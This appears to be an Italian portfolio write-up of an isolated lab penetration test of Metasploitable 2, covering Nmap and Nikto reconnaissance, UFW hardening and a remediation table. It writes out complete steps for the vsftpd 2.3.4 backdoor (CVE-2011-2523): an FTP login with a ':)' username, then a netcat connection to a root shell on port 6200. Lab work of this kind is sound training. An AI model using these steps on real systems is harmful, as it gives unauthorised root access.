
Laboratorio virtuale controllato di attacco e difesa — sfruttamento di CVE-2011-2523, ricognizione Nmap, scansione Nikto, rafforzamento UFW su Metasploitable 2
Un ambiente virtuale controllato che simula scenari reali di attacco e difesa
Questo laboratorio simula un test di penetrazione reale e un esercizio di rafforzamento difensivo in un ambiente virtuale completamente isolato. Dimostra l'intero ciclo di vita della sicurezza offensiva — dalla ricognizione allo sfruttamento — e i controlli difensivi che mitigherebbero ogni rischio.
Risultato chiave: Ottenuto accesso completo come root alla macchina target in meno di 60 secondi sfruttando un backdoor noto, senza credenziali e senza strumenti speciali.
Ricognizione → Scansione → Sfruttamento → Difesa e Rafforzamento
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt
Risultati chiave — 23 porte aperte in totale:
nikto -h http://192.168.148.130 -o nikto_before.txt
18 vulnerabilità trovate, tra cui:
phpinfo.php perde la configurazione completa del server/doc/, /test/vsftpd 2.3.4 contiene un backdoor introdotto tramite un compromesso della supply chain. Inviando un nome utente che termina con :) fa sì che il server apra una shell root sulla porta 6200.
# Step 1 — Attivare il backdoor tramite FTP
ftp 192.168.148.130
# Username: backdoor:) Password: anything
# Step 2 — Collegarsi alla shell generata
nc 192.168.148.130 6200
# Step 3 — Verificare l'accesso
whoami
# → root
Risultato: Accesso completo come root al sistema ottenuto in < 60 secondi — nessuna credenziale, nessun framework di sfruttamento richiesto.
Impatto: Un attaccante con accesso root può leggere/modificare/eliminare qualsiasi file, installare malware, esfiltrare dati, o spostarsi verso altri host sulla rete.
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp # Solo SSH
sudo ufw status verbose
Vedi report.md per la valutazione completa — metodologia completa, output dei comandi, tabella dei risultati, passaggi di sfruttamento e tutte le raccomandazioni di rimedio.
Questo laboratorio è stato condotto in un ambiente virtuale completamente isolato utilizzando software intenzionalmente vulnerabile (Metasploitable 2). Tutte le tecniche sono solo per scopi educativi e di portfolio. Non replicare su sistemi di cui non si possiede o per cui non si ha esplicita autorizzazione scritta per il test.
Autore: Amir Mohammad Marwi
| Componente | Dettagli |
|---|
| Hypervisor | VMware Workstation |
| Rete | Host-Only / NAT (completamente isolato) |
| Sistema Operativo Attaccante | Ubuntu 24 LTS |
| Sistema Operativo Target | Metasploitable 2 (Linux 2.6.x) |
| IP Attaccante | 192.168.148.255 |
| IP Target | 192.168.148.130 |
| Porta | Servizio | Versione | Rischio |
|---|
| 21 | FTP | vsftpd 2.3.4 | 🔴 CRITICO — Backdoor noto (CVE-2011-2523) |
| 22 | SSH | OpenSSH 4.7p1 | 🟡 MEDIO — Obsoleto |
| 23 | Telnet | Linux telnetd | 🟠 ALTO — Protocollo in chiaro |
| 80 | HTTP | Apache 2.2.8 | 🟠 ALTO — Multiple CVE |
| 1524 | Bindshell | Shell root | 🔴 CRITICO — Shell root aperta |
| 3306 | MySQL | 5.0.51a | 🟠 ALTO — Database esposto |
| 5900 | VNC | Protocollo 3.3 | 🟠 ALTO — Autenticazione debole |
| 6667 | IRC | UnrealIRCd | 🔴 CRITICO — Backdoor noto |
| Vulnerabilità | Rimedio |
|---|
| Backdoor vsftpd 2.3.4 | Aggiornare a vsftpd 3.x o migrare a SFTP |
| Shell root aperta (porta 1524) | Disabilitare immediatamente, verificare l'installazione |
| Telnet (porta 23) | Disabilitare — imporre solo SSH |
| phpMyAdmin esposto | Limitare per IP, richiedere autenticazione forte |
| MySQL esposto (porta 3306) | Vincolare a localhost, bloccare accesso esterno |
| VNC esposto (porta 5900) | Limitare per IP o disabilitare |
| Indicizzazione directory | Apache: Options -Indexes |
| HTTP TRACE | Apache: TraceEnable off |
| Apache + PHP obsoleti | Aggiornare a versioni LTS supportate |
| Strumento | Scopo |
|---|
| Nmap | Scansione delle porte e rilevamento servizi |
| Nikto | Scansione vulnerabilità web |
| Netcat | Connessione alla shell backdoor |
| UFW | Configurazione firewall basato su host |
| Client FTP | Attivazione del backdoor vsftpd |
| VMware Workstation | Virtualizzazione laboratorio |